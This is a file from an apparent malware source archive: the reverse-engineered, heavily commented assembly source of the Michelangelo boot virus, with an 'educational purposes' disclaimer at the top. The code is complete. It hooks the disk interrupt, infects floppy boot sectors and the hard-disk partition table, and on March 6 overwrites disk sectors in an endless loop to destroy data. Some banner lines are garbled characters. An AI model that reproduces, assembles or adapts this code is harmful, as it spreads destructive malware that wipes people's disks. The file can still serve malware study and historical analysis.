MalwareSourceCode/MSDOS/M-Index/Virus.MSDOS.Unknown.michel.asm

323 lines
18 KiB
NASM
Raw Permalink Normal View History

2022-08-21 09:07:57 +00:00
TITLE MICHELANGELO, a STONED - derived Boot Virus
SUBTTL reverse engineered source code for MASM 5.1/6.0
PAGE 60,132
.RADIX 16
IF1
%Out <20><> VIRAL SOFTWARE, DO NOT DISTRIBUTE WITHOUT NOTIFICATION ͻ
%Out <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
%Out <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ŀ<EFBFBD><C4BF><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
%Out <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ĵ M I C H E L A N G E L O <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>İ<EFBFBD><C4B0>
%Out <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ٰ<EFBFBD><D9B0><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
%Out <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
%Out <20><><EFBFBD> Layout (C) 1992 164A12565AA18213165556D3125C4B962712 <20>ͼ
ENDIF
comment #
! !
! MICHELANGELO di Ludovico Buonarroti Simoni, born March 6, 1475, !
! Caprese, Republic of Florence ... !
! This boot block / partition table virus will overwrite most of the !
! data on eiter floppy disks or winchester drives at HIS birthday. !
! !
! This source code may only be used for educational purposes! !
! !
! Do not offend the law by distributing viral or trojan horse soft- !
! ware to anybody who is not aware of the potential danger of the !
! software he receives. !
! !
#
B equ <BYTE>
D equ <DWORD>
O equ <OFFSET>
P equ <PTR>
S equ <SHORT>
T equ <THIS>
v equ <OR>
W equ <WORD>
SAVE MACRO _1,_2,_3,_4,_5,_6,_7,_8,_9,_a,_b,_c
IRP _X,<_1,_2,_3,_4,_5,_6,_7,_8,_9,_a,_b,_c>
IFNB <_X>
IFIDN <_X>,<F>
PUSHF
ELSE
PUSH _X
ENDIF
ENDIF
ENDM
ENDM
REST MACRO _1,_2,_3,_4,_5,_6,_7,_8,_9,_a,_b,_c
IRP _X,<_1,_2,_3,_4,_5,_6,_7,_8,_9,_a,_b,_c>
IFNB <_X>
IFIDN <_X>,<F>
POPF
ELSE
POP _X
ENDIF
ENDIF
ENDM
ENDM
MOV_S MACRO S1,S2
SAVE S2
REST S1
ENDM
TEXT SEGMENT PARA PUBLIC 'CODE'
ASSUME CS:TEXT,DS:TEXT,ES:TEXT
ORG 0
MICHELANGELO = 0306 ; ... his BCD birthday
;
SECSIZE = 0200 ;
WINCHESTER1 = 80 ;
bREAD = 2 ;
wREAD = bREAD SHL 8 ;
bWRITE = 3 ;
wWRITE = bWRITE SHL 8 ;
;
DTA = T B + SECSIZE ;
;
OR13OFF = T W + 04C ;
OR13SEG = T W + 04E ;
SYSRAM = T W + 413 ;
MOSTAT = T B + 43F ;
;
PARTTBL = T B + 1BE ;
;
OFSFRM0 EQU 7C00 ;
;
START: JMP INIT ;
;
; -----------------------------------------------------------------------------
;
SHDWRELOCOFS = T W + OFSFRM0 ;
RELOCOFS DW FRSTRLCTD ; Used by an indirect far jmp
SHDWRELOCSEG = T W + OFSFRM0 ; to the relocated code.
RELOCSEG DW ? ;
;
HEADS DB ? ;
;
CYLSEG DW ? ;
;
SHDW13OFS = T W + OFSFRM0 ;
BIOS13OFS DW ? ; Holds original (BIOS)
SHDW13SEG = T W + OFSFRM0 ; int 13 vector.
BIOS13SEG DW ? ;
;
; -----------------------------------------------------------------------------
;
I13_ISR: SAVE DS,AX ; INT 13 SR, save regs
OR DL,DL ; drive == A ?
JNZ I13_EX ; jmp if not
XOR AX,AX ; DS = 0
MOV DS,AX ;
TEST B P [MOSTAT],01 ; test diskette motor status:
JNZ I13_EX ; jmp if motor is already on
REST AX,DS ;
SAVE F ; call old interrupt 13
CALL D P CS:[BIOS13OFS] ; routine
SAVE F ; save FLAGS
CALL TstInfF ; test & infect if necessary
REST F ; restore FLAGS
RETF 2 ; return, preserve FLAGS
;
I13_EX: REST AX,DS ; restore regs, jmp to old int
JMP D P CS:[BIOS13OFS] ; 13h routine
;
TstInfF: SAVE AX,BX,CX,DX,DS,ES,SI,DI ;
MOV_S DS,CS ; ES = DS = CS;
MOV_S ES,CS ;
MOV SI,0004 ; SI = 4 (maxretry counter)
@@: MOV AX,wREAD v 1 ; AX : read one sector
MOV BX,O DTA ; BX : ... to buffer at CS:200
MOV CX,0001 ; CX : ... cylinder 0, sector 1
XOR DX,DX ; DX : ... drive 0, head 0
SAVE F ; call old int13 routine by
CALL D P [BIOS13OFS] ; simulating an interrupt
JNB @F ; jmp if there isn't an error,
XOR AX,AX ; else reset disk system ...
SAVE F ;
CALL D P [BIOS13OFS] ;
DEC SI ; decrement maxretry counter
JNZ @B ; try it again if not zero,
JMP S TstInfF_EX ; else jmp to exit in haste.
;
@@: XOR SI,SI ; boot sector has been read,
CLD ; now test if disk already has
LODSW ; been infected. Assume infect-
CMP AX,[BX] ; ion if the first 4 bytes of
JNZ @F ; MICHI and the boot sector are
LODSW ; identical ...
CMP AX,[BX+02] ;
JZ TstInfF_EX ; exit, disk already infected
@@: MOV AX,wWRITE v 1 ; AX : Write one sector
MOV DH,01 ; DH : Head 1
MOV CL,03 ; CL : Sector 3
CMP B P [BX+15],0FDH ; adjust CL to E if the MEDIA ID
JZ @F ; field of the original boot
MOV CL,0E ; sector is not FD (5.25",360K)
@@: MOV [CYLSEG],CX ; store CX
SAVE F ; and write the original boot
CALL D P [BIOS13OFS] ; sector to the floppy disk
JB TstInfF_EX ; if an error occured,
MOV SI,O PARTTBL + SECSIZE ; exit in haste.
MOV DI,O PARTTBL ; Copy the last bytes of
MOV CX,0021 ; the original boot sector to
CLD ; the end of MICHI
REP MOVSW ;
MOV AX,wWRITE v 1 ; ... and write it to the boot
XOR BX,BX ; sector of the disk.
MOV CX,0001 ;
XOR DX,DX ;
SAVE F ;
CALL D P [BIOS13OFS] ;
TstInfF_EX: REST DI,SI,ES,DS,DX,CX,BX,AX ; restore regs
RET ; ... return
;
; -----------------------------------------------------------------------------
;
INIT: XOR AX,AX ; Set DS and SS to 0000,
MOV DS,AX ; initialize SP to 7C00.
CLI ; That's because the boot
MOV SS,AX ; sector will loaded into
MOV AX,OFSFRM0 ; memory at 0:7C00 on every
MOV SP,AX ; IBM clone ...
STI ;
;
SAVE DS,AX ; save (0000:7C00) on stack
;
MOV AX,[OR13OFF] ; Read old interrupt 13h vector
MOV [SHDW13OFS],AX ; and save it
MOV AX,[OR13SEG] ;
MOV [SHDW13SEG],AX ;
;
MOV AX,[SYSRAM] ; Substract 2 from base memory
DEC AX ; size variable in BIOS data
DEC AX ; area
MOV [SYSRAM],AX ;
;
MOV CL,06 ; ES = AX = segment part of huge
SHL AX,CL ; ptr to area 2KB below last
MOV ES,AX ; base memory location
;
MOV [SHDWRELOCSEG],AX ; Store seg for ind far jmp
; to relocated code
MOV AX,O I13_ISR ; Store ptr to new interrupt
MOV [OR13OFF],AX ; 13 service routine to
MOV [OR13SEG],ES ; interrupt table,
MOV CX,O PARTTBL ; Relocate code,
MOV SI,OFSFRM0 ;
XOR DI,DI ;
CLD ;
REP MOVSB ;
JMP D P CS:[SHDWRELOCOFS] ; Jmp to FRSTRLCTD (relo-
; cated code)(BUGGY)
;
FRSTRLCTD: XOR AX,AX ; Reset the disk system
MOV ES,AX ;
INT 13 ;
MOV_S DS,CS ; ES = 0; DS = CS;
MOV AX,wREAD v 1 ; AH = 'Read', AL = # to read
MOV BX,OFSFRM0 ; ES:BX = 0:7C00 = xfer address
MOV CX,[CYLSEG] ; CH = cylinder #, CL = sector #
;
CMP CX,+07 ; Booted from winchester drive?
JNZ @F ; jmp if not
MOV DX,0000 v WINCHESTER1 ; DH = head 0, DL = drive C
INT 13 ; read the original boot sector
JMP S BOOTNOW ; and jmp
;
@@: MOV CX,[CYLSEG] ; adjust cylinder/sector #s
MOV DX,0100 ; DH = head 1, DL = drive A
INT 13 ; and read the sector ...
JB BOOTNOW ; (jmp on error, else continue)
MOV_S ES,CS ; ES = CS;
MOV AX,wREAD v 1 ; read partition table of 1st
MOV BX,O DTA ; hard disk into buffer located
MOV CX,0001 ; just after the relocated code
MOV DX,0000 v WINCHESTER1 ;
INT 13 ;
JB BOOTNOW ; (jmp on error, else continue)
XOR SI,SI ;
CLD ; test if hard disk is already
LODSW ; infected by comparing the 1st
CMP AX,[BX] ; four bytes, if these are
JNZ INFECT_PARTTBL ; identical assume that the
LODSW ; hard disk already is infected
CMP AX,[BX+02] ; and continue, else jmp to
JNZ INFECT_PARTTBL ; infect procedure
;
BOOTNOW: XOR CX,CX ; read date from real time clock
MOV AH,04 ; (will _not_ work on old BIOSes
INT 1A ; that do not implement it)
CMP DX,MICHELANGELO ; jmp if today is the
JZ BIRTHDAY ; birthday of MICHELANGELO
RETF ; 'return' to original boot sec-
; tor code
;
; -----------------------------------------------------------------------------
;
BIRTHDAY: XOR DX,DX ; DH = head 0; DL = drive A
MOV CX,0001 ; CH = cylinder 0; CL = sector 1
BIRTHDAY_LOOP: MOV AX,wWRITE v 9 ; AH = 'Write'; AL = # of sectrs
MOV SI,[CYLSEG] ; adjust AL ( # of sectors) and
CMP SI,+03 ; DL (drive code) depending on
JZ @F ; the type of the current boot
MOV AL,0E ; disk
CMP SI,+0E ;
JZ @F ;
MOV DL,WINCHESTER1 ;
MOV B P [HEADS],04 ;
MOV AL,11 ;
@@: MOV BX,5000 ; ES:BX -> 'Buffer' = 5000:5000
MOV ES,BX ;
INT 13 ;
JNB @F ;
XOR AH,AH ; reset disk system if an error
INT 13 ; occured
@@: INC DH ; increment head (DH)
CMP DH,[HEADS] ; head < maxhead? continue if
JB BIRTHDAY_LOOP ; equal, else loop
XOR DH,DH ;
INC CH ; increment cylinder and loop
JMP BIRTHDAY_LOOP ; ( goodbye data - cu never )
;
; -----------------------------------------------------------------------------
;
INFECT_PARTTBL: MOV CX,0007 ; It's an HD, take sector 7 to
MOV [CYLSEG],CX ; save the original partition
MOV AX,wWRITE v 1 ; table and write it to disk
MOV DX,0000 v WINCHESTER1 ;
INT 13 ;
JB BOOTNOW ; jmp on error
MOV SI,O PARTTBL + SECSIZE ; copy partition informa-
MOV DI,O PARTTBL ; tion to the end of MICHI
MOV CX,0021 ;
REP MOVSW ;
MOV AX,wWRITE v 1 ; and write MICHI to the first
XOR BX,BX ; sector of the hard disk ...
INC CL ;
INT 13 ;
JMP BOOTNOW ;
;
; -----------------------------------------------------------------------------
;
ORG SECSIZE - 2 ; Bootblock / partition table /
DB 055,0AA ; ROM signature
;
; -----------------------------------------------------------------------------
TEXT ENDS
END START